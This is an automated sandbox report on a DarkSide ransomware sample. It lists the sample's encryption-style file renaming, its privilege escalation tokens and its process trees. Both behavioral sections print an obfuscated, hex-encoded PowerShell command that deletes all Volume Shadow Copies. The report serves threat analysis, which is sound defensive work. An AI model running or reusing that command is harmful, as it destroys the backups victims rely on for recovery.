Malware Analysis Report

2024-10-16 03:29

Sample ID 210726-ma8yez7gv2
Target 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample
SHA256 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297
Tags
upx darkside ransomware spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297

Threat Level: Known bad

The file 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample was found to be: Known bad.

Malicious Activity Summary

upx darkside ransomware spyware stealer

DarkSide

UPX packed file

Modifies extensions of user files

Reads user/profile data of web browsers

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-07-26 12:39

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-07-26 12:39

Reported

2021-07-26 12:45

Platform

win7v20210408

Max time kernel

137s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\ExpandSubmit.tif.efaa031a C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File renamed C:\Users\Admin\Pictures\SelectLock.png => C:\Users\Admin\Pictures\SelectLock.png.efaa031a C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\SelectLock.png.efaa031a C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File renamed C:\Users\Admin\Pictures\UpdateDisable.tif => C:\Users\Admin\Pictures\UpdateDisable.tif.efaa031a C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\UpdateDisable.tif.efaa031a C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File renamed C:\Users\Admin\Pictures\EnterTest.tif => C:\Users\Admin\Pictures\EnterTest.tif.efaa031a C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\EnterTest.tif.efaa031a C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File renamed C:\Users\Admin\Pictures\ExpandSubmit.tif => C:\Users\Admin\Pictures\ExpandSubmit.tif.efaa031a C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A

Reads user/profile data of web browsers

spyware stealer

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe

"C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

N/A

Files

memory/752-60-0x00000000750C1000-0x00000000750C3000-memory.dmp

memory/1832-61-0x0000000000000000-mapping.dmp

memory/1832-62-0x000007FEFB701000-0x000007FEFB703000-memory.dmp

memory/1832-63-0x00000000020A0000-0x00000000020A1000-memory.dmp

memory/1832-64-0x000000001AB40000-0x000000001AB41000-memory.dmp

memory/1832-65-0x00000000024B0000-0x00000000024B1000-memory.dmp

memory/1832-66-0x000000001AAC0000-0x000000001AAC2000-memory.dmp

memory/1832-67-0x000000001AAC4000-0x000000001AAC6000-memory.dmp

memory/1832-68-0x00000000024E0000-0x00000000024E1000-memory.dmp

memory/1832-69-0x000000001C480000-0x000000001C481000-memory.dmp

memory/1832-70-0x000000001C620000-0x000000001C621000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 1f8db64be6c37e59515420a11c6befba
SHA1 eb9e3cfd05f3d0552f7fe70dfd0e651721ec8a85
SHA256 699ee64cf0eb24f8666597759b5a0e7fb6cf727c4e6d109e1c26b1f6bcf477ea
SHA512 829bc83ff956f278c4846ec5e0c90a4715a245fa98dab6beeafebef8e56b3f3a2cac2a973215d984cb8a5f97226c8bd4ce5289bae2deb701883df5fbee363557

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 c0dec4e1374490ca8e2ccac7538f4219
SHA1 b5ce5ff867d52f5d7533c167a01afad66d908d10
SHA256 acb51894e8438d8d0f61901edb4941ae33b1b7ae11e6f5356b4fde090adabd54
SHA512 6e748addcef4ae4ea3f9073775135c4be9bba8a5de60be89100ec5ce103ed5d2d67174b4e0acd1b1f31359eedae8df5240e1d79d4958be0e6d4f8e5cae5c46ca

Analysis: behavioral2

Detonation Overview

Submitted

2021-07-26 12:39

Reported

2021-07-26 12:45

Platform

win10v20210408

Max time kernel

35s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\CopyReset.raw.f001f8d5 C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File renamed C:\Users\Admin\Pictures\MergeUnregister.tiff => C:\Users\Admin\Pictures\MergeUnregister.tiff.f001f8d5 C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\SplitRedo.png.f001f8d5 C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File renamed C:\Users\Admin\Pictures\BlockConvert.png => C:\Users\Admin\Pictures\BlockConvert.png.f001f8d5 C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\CompleteDisconnect.tiff C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File renamed C:\Users\Admin\Pictures\CopyReset.raw => C:\Users\Admin\Pictures\CopyReset.raw.f001f8d5 C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File renamed C:\Users\Admin\Pictures\JoinOut.tif => C:\Users\Admin\Pictures\JoinOut.tif.f001f8d5 C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\MergeUnregister.tiff C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File renamed C:\Users\Admin\Pictures\RestartEdit.raw => C:\Users\Admin\Pictures\RestartEdit.raw.f001f8d5 C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File renamed C:\Users\Admin\Pictures\SplitRedo.png => C:\Users\Admin\Pictures\SplitRedo.png.f001f8d5 C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\BlockConvert.png.f001f8d5 C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File renamed C:\Users\Admin\Pictures\CompleteDisconnect.tiff => C:\Users\Admin\Pictures\CompleteDisconnect.tiff.f001f8d5 C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File renamed C:\Users\Admin\Pictures\ResolveRegister.tif => C:\Users\Admin\Pictures\ResolveRegister.tif.f001f8d5 C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\RestartEdit.raw.f001f8d5 C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\CompleteDisconnect.tiff.f001f8d5 C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\JoinOut.tif.f001f8d5 C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\MergeUnregister.tiff.f001f8d5 C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResolveRegister.tif.f001f8d5 C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File renamed C:\Users\Admin\Pictures\StopEdit.raw => C:\Users\Admin\Pictures\StopEdit.raw.f001f8d5 C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\StopEdit.raw.f001f8d5 C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A

Reads user/profile data of web browsers

spyware stealer

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe

"C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

N/A

Files

memory/3612-114-0x0000000000000000-mapping.dmp

memory/3612-119-0x00000164E4D90000-0x00000164E4D91000-memory.dmp

memory/3612-123-0x00000164FD450000-0x00000164FD451000-memory.dmp

memory/3612-132-0x00000164FD440000-0x00000164FD442000-memory.dmp

memory/3612-133-0x00000164FD443000-0x00000164FD445000-memory.dmp

memory/3612-134-0x00000164FD446000-0x00000164FD448000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ea6243fdb2bfcca2211884b0a21a0afc
SHA1 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA256 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 35041379cc75fcc9fb42ce3e4f901728
SHA1 12051d56c93158131177eb7a8220a1f2a26889bb
SHA256 68f2a1ab7e476374a20349a17c273a9a3a0941d0ac79a7a3823f0e9a8e208f69
SHA512 2d2a3969250afe48905e120f267267230190a566ee82cfcb4f3e3d17bee4d90497555f5a9484a40cfb032eb4f0cf412dbddc35339957a3afe23938520a2e52a5